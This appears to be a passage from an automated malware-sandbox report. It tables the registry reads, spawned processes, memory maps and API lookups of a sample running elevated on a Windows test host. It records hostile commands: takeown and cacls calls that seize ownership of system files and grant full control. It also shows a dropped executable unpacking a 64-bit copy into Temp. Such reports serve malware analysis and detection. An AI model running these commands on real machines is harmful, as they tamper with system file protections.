| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x374, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xd90, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (36)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
10 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
3 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 |
Process #201: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #201 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:18, Reason: Child Process |
| Unmonitor | End Time: 00:03:20, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x6b0 |
| Parent PID | 0xf08 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
944
0x
C7C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00210000 | 0x0021ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000b00000 | 0x00b00000 | 0x04afffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004b00000 | 0x04b00000 | 0x04b1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b00000 | 0x04b00000 | 0x04b0ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004b10000 | 0x04b10000 | 0x04b13fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b20000 | 0x04b20000 | 0x04b21fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x04b20000 | 0x04b24fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004b30000 | 0x04b30000 | 0x04b43fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004b50000 | 0x04b50000 | 0x04b8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b90000 | 0x04b90000 | 0x04bcffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004bd0000 | 0x04bd0000 | 0x04bd3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004be0000 | 0x04be0000 | 0x04be0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004bf0000 | 0x04bf0000 | 0x04bf1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04c00000 | 0x04cbdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004cc0000 | 0x04cc0000 | 0x04cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d00000 | 0x04d00000 | 0x04d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d40000 | 0x04d40000 | 0x04d40fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d50000 | 0x04d50000 | 0x04d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d60000 | 0x04d60000 | 0x04ffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d60000 | 0x04d60000 | 0x04eaffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x04d60000 | 0x04d89fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004d60000 | 0x04d60000 | 0x04d60fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ea0000 | 0x04ea0000 | 0x04eaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f00000 | 0x04f00000 | 0x04ffffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005000000 | 0x05000000 | 0x05187fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005190000 | 0x05190000 | 0x05310fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005320000 | 0x05320000 | 0x0671ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06720000 | 0x06a56fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x748a0000 | 0x748c7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f850000 | 0x7f850000 | 0x7f94ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f950000 | 0x7f950000 | 0x7f972fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f976000 | 0x7f976000 | 0x7f976fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f979000 | 0x7f979000 | 0x7f97bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f97c000 | 0x7f97c000 | 0x7f97efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f97f000 | 0x7f97f000 | 0x7f97ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #203: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #203 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\en-US\Journal.exe.mui" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:18, Reason: Child Process |
| Unmonitor | End Time: 00:03:20, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x808 |
| Parent PID | 0x6f8 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E20
0x
C84
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00830000 | 0x00839fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000df0000 | 0x00df0000 | 0x04deffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004df0000 | 0x04df0000 | 0x04e0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004df0000 | 0x04df0000 | 0x04dfffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004e00000 | 0x04e00000 | 0x04e03fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e10000 | 0x04e10000 | 0x04e11fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e10000 | 0x04e10000 | 0x04e13fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004e20000 | 0x04e20000 | 0x04e33fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004e40000 | 0x04e40000 | 0x04e7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e80000 | 0x04e80000 | 0x04ebffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ec0000 | 0x04ec0000 | 0x04ec3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004ed0000 | 0x04ed0000 | 0x04ed0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ee0000 | 0x04ee0000 | 0x04ee1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ef0000 | 0x04ef0000 | 0x04f2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f30000 | 0x04f30000 | 0x04f6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f70000 | 0x04f70000 | 0x04f7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f80000 | 0x04f80000 | 0x0516ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04f80000 | 0x0503dfff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe.mui | 0x05040000 | 0x05041fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005070000 | 0x05070000 | 0x0516ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005170000 | 0x05170000 | 0x0533ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05340000 | 0x05676fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x748a0000 | 0x748c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f410000 | 0x7f410000 | 0x7f50ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f510000 | 0x7f510000 | 0x7f532fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f536000 | 0x7f536000 | 0x7f538fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f539000 | 0x7f539000 | 0x7f53bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f53c000 | 0x7f53c000 | 0x7f53cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f53d000 | 0x7f53d000 | 0x7f53dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #204: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #204 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:19, Reason: Child Process |
| Unmonitor | End Time: 00:03:22, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbd8 |
| Parent PID | 0x57c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
3A8
0x
CE0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x005effff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00480000 | 0x004a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x004dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x005effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000680000 | 0x00680000 | 0x00807fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x00990fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009a0000 | 0x009a0000 | 0x01d9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74800000 | 0x74891fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
